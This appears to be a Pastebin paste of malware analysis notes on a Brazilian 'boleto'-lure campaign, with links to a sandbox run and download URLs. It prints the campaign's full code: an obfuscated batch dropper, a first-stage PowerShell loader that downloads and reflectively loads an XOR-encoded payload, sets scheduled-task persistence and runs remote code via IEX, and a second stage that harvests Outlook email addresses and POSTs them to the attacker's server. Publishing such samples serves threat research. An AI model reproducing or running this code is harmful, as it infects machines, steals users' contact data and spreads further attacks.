Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://app.any.run/tasks/db253ae2-2864-479d-a0dd-de0dbfe73796
- https://transfer.sh/DsEla/files.7z
- http://higridis.site/boleto.php -> https://www.dropbox.com/s/7tc757lrqz48ojm/Termo-Acerto_1525379604.zip?dl=1
- Termo-Acerto_1525379604.cmd:
- @echo off
- cd %SystemRoot%\System32
- set fTP=
- Set fTP=%fTP%Cq2a
- Set fTP=%fTP%SiK7
- Set fTP=%fTP%rmhc
- Set fTP=%fTP%zXwB
- Set fTP=%fTP%8yIM
- Set fTP=%fTP%1uYj
- Set fTP=%fTP%Je6k
- Set fTP=%fTP%G0fO
- Set fTP=%fTP%dtsF
- Set fTP=%fTP%5gPv
- Set fTP=%fTP%VQE3
- Set fTP=%fTP%4oWT
- Set fTP=%fTP%DUZ9
- Set fTP=%fTP%nlLx
- Set fTP=%fTP%pHAb
- Set fTP=%fTP%RN
- set aa=^|
- set data=
- Set data=%data%%fTP:~5,1%%fTP:~42,1%%fTP:~13,1%("%fTP:~18,1%%fTP:~42,1%%fTP:~55,1%(%fTP:~61,1%%fTP:~25,1%
- Set data=%data%%fTP:~46,1%-%fTP:~45,1%%fTP:~59,1%%fTP:~24,1%%fTP:~25,1%%fTP:~11,1%%fTP:~47,1% %fTP:~61,1%%fTP:~25,1%
- Set data=%data%%fTP:~47,1%.%fTP:~14,1%%fTP:~42,1%%fTP:~15,1%%fTP:~11,1%%fTP:~54,1%%fTP:~18,1%%fTP:~25,1%%fTP:~52,1%%fTP:~33,1%
- Set data=%data%).%fTP:~32,1%%fTP:~31,1%%fTP:~46,1%%fTP:~52,1%%fTP:~54,1%%fTP:~31,1%%fTP:~3,1%%fTP:~48,1%%fTP:~34,1%
- Set data=%data%%fTP:~47,1%%fTP:~8,1%%fTP:~5,1%%fTP:~52,1%%fTP:~28,1%('%fTP:~10,1%%fTP:~33,1%%fTP:~33,1%
- Set data=%data%%fTP:~56,1%%fTP:~34,1%://%fTP:~32,1%%fTP:~53,1%%fTP:~9,1%.%fTP:~52,1%%fTP:~3,1%
- Set data=%data%%fTP:~32,1%%fTP:~45,1%%fTP:~53,1%%fTP:~33,1%.%fTP:~11,1%%fTP:~45,1%%fTP:~9,1%/?%fTP:~32,1%
- Set data=%data%%fTP:~9,1%%fTP:~24,1%%fTP:~5,1%%fTP:~21,1%%fTP:~58,1%%fTP:~3,1%%fTP:~28,1%%fTP:~22,1%%fTP:~26,1%%fTP:~42,1%%fTP:~0,1%
- Set data=%data%%fTP:~51,1%%fTP:~50,1%%fTP:~33,1%%fTP:~15,1%%fTP:~25,1%%fTP:~16,1%%fTP:~56,1%%fTP:~6,1%%fTP:~47,1%%fTP:~19,1%%fTP:~0,1%
- Set data=%data%%fTP:~4,1%%fTP:~37,1%%fTP:~56,1%%fTP:~60,1%%fTP:~25,1%%fTP:~40,1%%fTP:~13,1%%fTP:~53,1%%fTP:~3,1%%fTP:~20,1%%fTP:~54,1%
- Set data=%data%%fTP:~48,1%%fTP:~56,1%%fTP:~22,1%%fTP:~52,1%%fTP:~14,1%%fTP:~36,1%%fTP:~32,1%%fTP:~13,1%%fTP:~30,1%%fTP:~34,1%%fTP:~0,1%
- Set data=%data%%fTP:~18,1%%fTP:~54,1%%fTP:~13,1%%fTP:~3,1%%fTP:~43,1%%fTP:~35,1%%fTP:~23,1%%fTP:~55,1%%fTP:~60,1%%fTP:~49,1%%fTP:~23,1%
- Set data=%data%%fTP:~32,1%%fTP:~23,1%%fTP:~34,1%%fTP:~17,1%%fTP:~60,1%%fTP:~31,1%%fTP:~4,1%%fTP:~34,1%%fTP:~31,1%%fTP:~4,1%%fTP:~31,1%
- Set data=%data%%fTP:~1,1%%fTP:~23,1%%fTP:~8,1%%fTP:~23,1%%fTP:~59,1%%fTP:~31,1%%fTP:~46,1%%fTP:~21,1%%fTP:~8,1%%fTP:~54,1%%fTP:~61,1%
- Set data=%data%%fTP:~47,1%%fTP:~39,1%%fTP:~18,1%%fTP:~28,1%%fTP:~58,1%%fTP:~3,1%%fTP:~58,1%%fTP:~45,1%%fTP:~40,1%%fTP:~14,1%%fTP:~43,1%
- Set data=%data%%fTP:~27,1%%fTP:~48,1%%fTP:~16,1%%fTP:~2,1%/%fTP:~46,1%%fTP:~8,1%%fTP:~18,1%%fTP:~38,1%%fTP:~58,1%%fTP:~59,1%
- Set data=%data%%fTP:~43,1%%fTP:~40,1%%fTP:~50,1%%fTP:~9,1%%fTP:~48,1%%fTP:~50,1%%fTP:~3,1%/%fTP:~5,1%%fTP:~58,1%%fTP:~51,1%
- Set data=%data%%fTP:~36,1%')");
- echo %%data%%%aa%%fTP:~46,1%%fTP:~5,1%%fTP:~52,1%%fTP:~32,1%%fTP:~45,1%%fTP:~14,1%%fTP:~34,1%%fTP:~38,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~4,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%\%fTP:~39,1%%fTP:~20,1%.%fTP:~29,1%\%fTP:~56,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~34,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%.%fTP:~25,1%%fTP:~55,1%%fTP:~25,1% -%fTP:~52,1%%fTP:~45,1%%fTP:~56,1% -%fTP:~14,1%%fTP:~5,1%%fTP:~52,1% %fTP:~20,1% -
- 1st stage:
- $fileName = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyyMMdd'))"
- $bExists = [System.IO.File]::Exists($fileName)
- if (-Not $bExists) {
- "" | Set-Content $fileName
- $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.nadolt.com/?dmNvsQSFZqUA8ptBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbOWurLMjuHl4AB6tr3Eb//fWEH/0b3Vc1B8S+3gx5")
- for($i=0; $i -lt $bytes.count; $i++) {
- $bytes[$i] = $bytes[$i] -bxor 0x6A
- }
- [Reflection.Assembly]::Load($bytes)
- $rInt = [Loader]::randomInt(4, 16)
- $prefix = "$([Loader]::RandomString($rInt))-"
- [Loader]::Go3("https://dlm.nadolt.com","dmBkvwaGaqEA9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrh0b7oqGxFKsXkFNmDJY=","dmFlsQGAZacF95tBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxQfwfmFE0BZU=","dWRiuwGCYKdOoZ5uaslIatKzrpM7UgxV6Lz7bmE0QXHGC4HxaEtS0jo3UiQSRPqoPSGqi7rzFHiAN87dMGYAAZ9D80Ls2/L9TLFDxwE2AJHv2Q==","dWFksACDZ6UF9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3VE2BZC/3A56",$prefix)
- $var1 = [Loader]::RandomString($rInt)
- $var2 = [Loader]::RandomString($rInt)
- $var3 = [Loader]::RandomString($rInt)
- $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
- $cmdSource = "@Echo off`r`n"
- $cmdSource += "Setlocal EnableExtensions`r`n"
- $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
- $cmdSource += "Set $var1=HKCU`r`n"
- $cmdSource += "Set $var1=%$var1%\Software`r`n"
- $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
- $cmdSource += "Set $var2=`r`n"
- $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
- $cmdSource += "Set $var3=%%11`r`n"
- $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
- $cmdSource += "Set $var2=!$var2!%%3`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += "%$var2%`r`n"
- $cmdSource | Set-Content $cmdFileName
- $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
- $WshShell = New-Object -comObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut($lnkFilename)
- $Shortcut.TargetPath = $cmdFileName
- $Shortcut.WindowStyle = 7
- $Shortcut.Save()
- $TaskStartTime = [datetime]::Now.AddSeconds(5)
- $TaskEndTime = [datetime]::Now.AddSeconds(35)
- $taskName = [Loader]::RandomString($rInt)
- $service = New-Object -ComObject("Schedule.Service")
- $service.Connect()
- $rootFolder = $service.GetFolder("\")
- $TaskDefinition = $service.NewTask(0)
- $TaskDefinition.RegistrationInfo.Description = ""
- $TaskDefinition.Settings.Enabled = $true
- $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
- $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
- $triggers = $TaskDefinition.Triggers
- $trigger = $triggers.Create(1)
- $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.Enabled = $true
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = $cmdFileName
- $action.Arguments = ""
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = "schtasks.exe"
- $action.Arguments = "/Delete /F /TN $taskName"
- $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
- $urlPL = "https://dlm.nadolt.com/?dmRlsQKLZasK8JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMAEFpAYlS6o="
- IEX(New-Object Net.WebClient).DownloadString("https://dlm.nadolt.com/?dmVjuw2Aa6ID9ZtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT83WAXs4HpFoxEb4w/WCGIRPxzI5Cdq83F0tMARSpw==")
- }
- 2nd stage:
- Add-Type -assembly $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBPAGYAZgBpAGMAZQAuAEkAbgB0AGUAcgBvAHAALgBPAHUAdABsAG8AbwBrAA==')))
- ${_/=\/\__/=\/\/\__} = New-Object -comobject Outlook.Application
- ${____/===\_____/\/} = ${_/=\/\__/=\/\/\__}.GetNameSpace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBBAFAASQA='))))
- ${_/\/=====\__/=\/=} = [System.Collections.ArrayList]@()
- function ___/=\/\/=\___/=\_(${____/\____/\/\_/\_})
- {
- ${____/==\__/\_/=\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBbAF8AYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBfAGEALQB6ADAALQA5AC0AXQArACkAKgBAAFsAYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBhAC0AegAwAC0AOQAtAF0AKwApACoAKABcAC4AWwBhAC0AegBdAHsAMgAsADQAfQApACQA')));
- if (${____/\____/\/\_/\_} -match ${____/==\__/\_/=\_}) {
- return $true
- }
- return $false
- }
- function _/=\_/==\____/\__/(${____/\____/\/\_/\_}) {
- if (${____/\____/\/\_/\_}) {
- ${__/=====\/\_/\_/\} = $false
- ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.ToLower()
- if (${____/\____/\/\_/\_}.StartsWith("'") -And ${____/\____/\/\_/\_}.EndsWith("'")) {
- ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.Substring(1, ${____/\____/\/\_/\_}.Length - 2)
- }
- if (___/=\/\/=\___/=\_(${____/\____/\/\_/\_})) {
- for(${__/\/\__/=\/\__/\} = 0;${__/\/\__/=\/\__/\} -lt ${_/\/=====\__/=\/=}.Count;${__/\/\__/=\/\__/\}++) {
- if (${_/\/=====\__/=\/=}[${__/\/\__/=\/\__/\}] -eq ${____/\____/\/\_/\_}) {
- ${__/=====\/\_/\_/\} = $true
- break
- }
- }
- if (-Not ${__/=====\/\_/\_/\}) {
- ${__/\___/========\} = ${_/\/=====\__/=\/=}.Add(${____/\____/\/\_/\_})
- }
- }
- }
- }
- function _/====\__/=====\_/ {
- ${/==\/=\____/\_/=\} = ${____/===\_____/\/}.AddressLists
- for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${/==\/=\____/\_/=\}.Count;${__/\/\__/=\/\__/\}++) {
- ${/=\_/==\/\__/==\_} = ${/==\/=\____/\_/=\}.Item(${__/\/\__/=\/\__/\}).AddressEntries
- for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${/=\_/==\/\__/==\_}.Count;${/==\/\/\_/\_/\__/}++) {
- ${_/\_/\__/\_____/=} = ${/=\_/==\/\__/==\_}.Item(${/==\/\/\_/\_/\__/})
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = ""
- if (${__/===\/===\/\/\_} -eq 10) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- } elseif ((${__/===\/===\/\/\_} -eq 3) -Or (${__/===\/===\/\/\_} -eq 1) -Or (${__/===\/===\/\/\_} -eq 4) -Or (${__/===\/===\/\/\_} -eq 2) -Or (${__/===\/===\/\/\_} -eq 5) -Or (${__/===\/===\/\/\_} -eq 0)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
- }
- }
- function __/\/\__/\_/===\_/(${___/\/==\_/==\/=\/}) {
- for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${___/\/==\_/==\/=\/}.Count;${__/\/\__/=\/\__/\}++) {
- ${_/======\_/=\/=\_} = ${___/\/==\_/==\/=\/}.Item(${__/\/\__/=\/\__/\})
- ${__/\/=\___/\_/==\} = ${_/======\_/=\/=\_}.Items
- for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${__/\/=\___/\_/==\}.Count;${/==\/\/\_/\_/\__/}++) {
- ${_/==\_____/==\__/} = ${__/\/=\___/\_/==\}.Item(${/==\/\/\_/\_/\__/})
- ${/=\/====\____/=\/} = ${_/==\_____/==\__/}.Recipients
- for(${_/\_/\__/\/\_/=\_} = 1;${_/\_/\__/\/\_/=\_} -le ${/=\/====\____/=\/}.Count;${_/\_/\__/\/\_/=\_}++) {
- ${__/\_/\__/=\/\_/\} = ${/=\/====\____/=\/}.Item(${_/\_/\__/\/\_/=\_})
- ${_/\_/\__/\_____/=} = ${__/\_/\__/=\/\_/\}.AddressEntry
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = "";
- if (${__/===\/===\/\/\_} -eq 0) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
- ${_/\_/\__/\_____/=} = ${_/==\_____/==\__/}.Sender
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = "";
- if (${__/===\/===\/\/\_} -eq 0) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
- __/\/\__/\_/===\_/(${_/======\_/=\/=\_}.Folders)
- }
- }
- function ____/=\_/\_/==\/==() {
- _/====\__/=====\_/
- __/\/\__/\_/===\_/(${____/===\_____/\/}.Folders)
- ${/\_____/\_/\/==\/} = [System.Runtime.Interopservices.Marshal]::ReleaseComObject(${_/=\/\__/=\/\/\__})
- ${_/\__/\/\/\_/\/=\} = [System.Net.WebRequest]::Create($urlPL)
- ${/=\___/==\/=\__/=} = [System.Text.Encoding]::UTF8.GetBytes("list=$(${_/\/=====\__/=\/=} -join ';')")
- ${_/\__/\/\/\_/\/=\}.Method = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABPAFMAVAA=')))
- ${_/\__/\/\/\_/\/=\}.ContentType = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AeAAtAHcAdwB3AC0AZgBvAHIAbQAtAHUAcgBsAGUAbgBjAG8AZABlAGQA')))
- ${_/\__/\/\/\_/\/=\}.ContentLength = ${/=\___/==\/=\__/=}.length
- ${___/=\_/\/\/=\___} = ${_/\__/\/\/\_/\/=\}.GetRequestStream()
- ${___/=\_/\/\/=\___}.Write(${/=\___/==\/=\__/=}, 0, ${/=\___/==\/=\__/=}.length)
- ${___/=\_/\/\/=\___}.Close()
- [System.Net.WebResponse] ${/===\/=\____/\/=\} = ${_/\__/\/\/\_/\/=\}.GetResponse()
- }
- function _/=\/\/\_/\____/=\() {
- ${__/======\____/\_} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAC4ATwB1AHQAbABvAG8AawA=')))
- ${__/==\/\__/\/===\} = [System.IO.File]::Exists(${__/======\____/\_})
- if (-Not ${__/==\/\__/\/===\}) {
- "" | sc ${__/======\____/\_}
- ____/=\_/\_/==\/==
- }
- }
- _/=\/\/\_/\____/=\
Add Comment
Please, Sign In to add comment